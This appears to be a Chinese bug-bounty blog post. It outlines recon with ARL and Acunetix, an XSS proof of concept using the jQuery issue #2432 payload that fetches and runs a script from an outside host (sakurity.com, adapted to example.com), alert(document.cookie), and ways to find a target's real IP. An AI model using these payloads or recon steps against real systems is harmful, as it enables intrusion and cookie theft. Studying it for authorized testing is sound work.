免责声明
欢迎访问我的博客。以下内容仅供教育和信息用途:
-
合法性:我不支持或鼓励非法活动。请确保遵守法律法规。
-
信息准确性:尽管我尽力提供准确的信息,但不保证其完全准确或适用。使用前请自行验证。
-
风险提示:技术使用可能带来风险,如系统损坏或数据丢失。请谨慎使用,并自行承担风险。
-
责任限制:我对使用博客内容产生的任何损害不承担责任。
-
第三方链接:博客中的链接仅为方便用户,内容不由我负责。
使用本博客即表示您同意以上条款。如果有疑问,请联系我。
漏洞平台:补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC
个人总结的挖洞流程:
1)先用工具信息收集一波
我这里先用灯塔收集一下目标资产
2)然后用漏洞扫描工具扫描一波
我这里用Acunetix进行扫描
因为工具扫描需要点时间,所以我们也可以先进行手动渗透测试
漏洞扫描结果出来了,我们就可以查看一下情况
3)最后我这里发现了xss注入
我根据告警访问他引用的文章获取到了原始是payload:Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses · Issue #2432 · jquery/jquery · GitHub
$.get('http://sakurity.com/jqueryxss')
我这里改造一下,然后拿到目标的控制台中执行
$.get('https://example.com/fakeurl')
.done(function(data) {
alert('远程连接成功,数据:' + data);
})
.fail(function() {
alert(document.cookie);
});
4)最后如果你要提交漏洞的话你还需要收集目标域名的真实ip的地址
这里可以用在线的多地ping网站:网速测试,测网速,网站速度测试,卡卡测速网—卡卡网 www.webkaka.com
获取真实ip
有真实ip后就可以获取ip地址
iP地址查询--手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)